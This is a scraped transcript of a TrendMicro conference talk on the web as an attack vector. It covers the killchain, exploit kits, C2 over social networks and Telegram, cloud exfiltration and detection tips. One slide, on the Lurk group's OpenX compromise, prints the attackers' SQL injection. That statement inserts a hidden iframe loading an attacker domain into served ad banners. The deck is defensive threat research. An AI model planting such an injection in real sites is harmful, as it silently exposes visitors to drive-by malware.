fyodor yarochkin, vladimir kropotov, trendmicro · fyodor yarochkin, vladimir kropotov, trendmicro...
TRANSCRIPT
![Page 1: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/1.jpg)
![Page 2: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/2.jpg)
Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR
Web As Ongoing Threat Vector: Case Studies from Europe and Asia Pacific
![Page 3: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/3.jpg)
Introduction
3
![Page 4: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/4.jpg)
So how web is being used and abused?
The trivial: Drive-bysEKs.. but there is much more than this
4
![Page 5: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/5.jpg)
Software gets smarter, users become .. the opposite ;)
With or without YOU...
5
![Page 6: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/6.jpg)
Penetration and Data Exfil. Campaigns
These seem to leverage web for all steps of traditional killchain:• recon :social lures, system fingerprinting,
targeted delivery of first stage payloads•exploitation: exploits, social engineering tricks,
phishing• c2: compromised sites, proxies, social network
websites •data exfiltration: cloud services are often used
for data exfil to mimic user behaviors
6
![Page 7: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/7.jpg)
Out of scope
•We will not talk about trivial stuff here.•We will not talk about Denial of Service Attacks,
Except for unusual trends.•We expect everybody in the room knows what
Exploit Kits and Drive-by-Download attacks are
• Focus less known, but important cases and situations
7
![Page 8: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/8.jpg)
Censorship will save the future :)
![Page 9: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/9.jpg)
Side effects of Internet Censorship
![Page 10: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/10.jpg)
Infrastructure compromise could lead to bad impacts
Blacklisted domains resolve to “arbitrary” sites
Github incident
![Page 11: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/11.jpg)
GosKomNadzor (blacklisting)
![Page 12: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/12.jpg)
dymoff.space
![Page 13: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/13.jpg)
dymoff.space
![Page 14: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/14.jpg)
How to Kill a site in country-wide scale
![Page 15: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/15.jpg)
The Killchain
the common concept that Web is used during the exploitation process.The reality is that we’ve seen use of web systems across the whole killchain.
15
SMART
![Page 16: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/16.jpg)
Killchain: Reconnaissance
16
![Page 17: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/17.jpg)
Fingerprinting: scanbox like techniques
Discussed: http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.htmlhttp://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html
Also by TombKeeper in 2013
17
![Page 18: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/18.jpg)
Reconnessance tools
18
![Page 19: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/19.jpg)
Non Violent environment fingerprinting actions
Flash case from Lurk:
19
![Page 20: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/20.jpg)
Recon with multi-staged payloads
20
![Page 21: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/21.jpg)
Killchain: delivery and exploitation
21
![Page 22: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/22.jpg)
Web portals as a threat vector
• Initial vectors of compromise in targeted attacks (map pentest and APT scenarios)• Misconfigurations and their consequences
(unpredicted data leaks)
•Exfiltration as a customer communication (hypothetical, but maybe already in the wild)
•BPC or Business logic compromises
22
![Page 23: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/23.jpg)
Anti-forensic in early days
23
![Page 24: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/24.jpg)
Delivery on non-standard ports
24
![Page 25: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/25.jpg)
Watering Hole as a threat vector
credit: Joseph C Chen
25
![Page 26: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/26.jpg)
Caching routines as a threat vector (Lurk Case 1)
• memcached Cache poisoning•Observed: continuous flood of connection requests to TCP 11211 (default memcached port)•Cached pages were updated with ‘iframed’ versions of these pages on the fly
26
![Page 27: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/27.jpg)
SSH Vuln as a threat vector (Lurk Case 2)
•Machine was compromised via an ssh vulnerability•Apache web server had additional module installed: mod_proxy_mysql.so (didn’t link any mysql libraries)•This is possibly a modified version of http://pastebin.com/raw/6wWVsstj as reported by succuri (https://blog.sucuri.net/2013/01/server-side-iframe-injections-via-apache-modules-and-sshd-backdoor.html)
27
![Page 28: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/28.jpg)
OpenX as a threat vector (Lurk Case 3)OpenX compromise• webshell installed• The Lurk group periodically modified banners table with
•update `banners` set htmltemplate=concat(htmltemplate, '<script>document.write(\'<div style="position:absolute;left:1000px;top:-1280px;">
•<iframe src="http://couldvestuck.org/XZAH"></iframe></div>\');
•</script>') where storagetype='html'•This causes the OpenX script ‘/www/delivery/ajs.php’ to produce the HTML code with this iframe snippet appearing at the page.
28
![Page 29: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/29.jpg)
EK Evolution mostly focused on Usability and Antiforensics
•Serve where you can
•Serve by IP once per day
• Include GEO specifics
•Serve during Intervals
•Serve for appropriate browser
•Server in appropriate environment
• ….
29
![Page 30: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/30.jpg)
ADD Period Abuse
30
![Page 31: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/31.jpg)
Exploiting trusted redirects
31
![Page 32: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/32.jpg)
Killchain: Command And Control
32
![Page 33: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/33.jpg)
social networks are widely utilized as intermediate c2
33
![Page 34: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/34.jpg)
Telegram as c2
34
![Page 35: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/35.jpg)
Legit and non legit use
•C2 on compromised web sites (Korea case and many others)•Major objectives
–Adds extra layer of obfuscation–Minimize untrusted connections issues
35
![Page 36: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/36.jpg)
Steganography
Hunting for MZ (pe binaries) insiide .jpg files Saumil did awesome job exploring the boundaries: stegosploit
36
![Page 37: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/37.jpg)
Persistence: awesomeness of simplicity
37
![Page 38: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/38.jpg)
Killchain: Action
38
![Page 39: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/39.jpg)
Ransomware attacks on server side web application
•All your data belongs to us
39
![Page 40: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/40.jpg)
Cloud Exfiltration
40
![Page 41: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/41.jpg)
Cloud Exfiltration
41
![Page 42: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/42.jpg)
Client side web application as a threat vector
Maybe extend attack surface to open redirect,
•open redirect•SSRF•Phishing forms•EK And make an introducion and focus on interesting EK cases
42
![Page 43: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/43.jpg)
Tips on Detection
•Defence Action plan for CSIRT teams
43
![Page 44: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/44.jpg)
Small things matter: investigate
44
![Page 45: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/45.jpg)
Other interesting artifacts of Web Exploitation
45
![Page 46: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/46.jpg)
Exploit Kit Traces: ActiveX Controls
•
46
![Page 47: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/47.jpg)
Detection and mitigation experience
•Applying IOCs for own protection•How to tune proxies for EK Mitigation
•Web as a second Echelon of Email attacks
–Good case, javascript by email, which triggers binary troug web
•
47
![Page 48: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/48.jpg)
Hacker, hacker, who are you?
•VPN problem?
48
![Page 49: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/49.jpg)
Strange use of F...
49
![Page 50: Fyodor Yarochkin, Vladimir Kropotov, TrendMicro · Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR ... •BPC or Business logic compromises 22. ... •This causes the OpenX script](https://reader031.vdocuments.site/reader031/viewer/2022021506/5b01b2b17f8b9ad85d8e8c13/html5/thumbnails/50.jpg)
LEVEL 80: Persistence in the human brain - Abuse of social networks to manipulate Human Decisions
50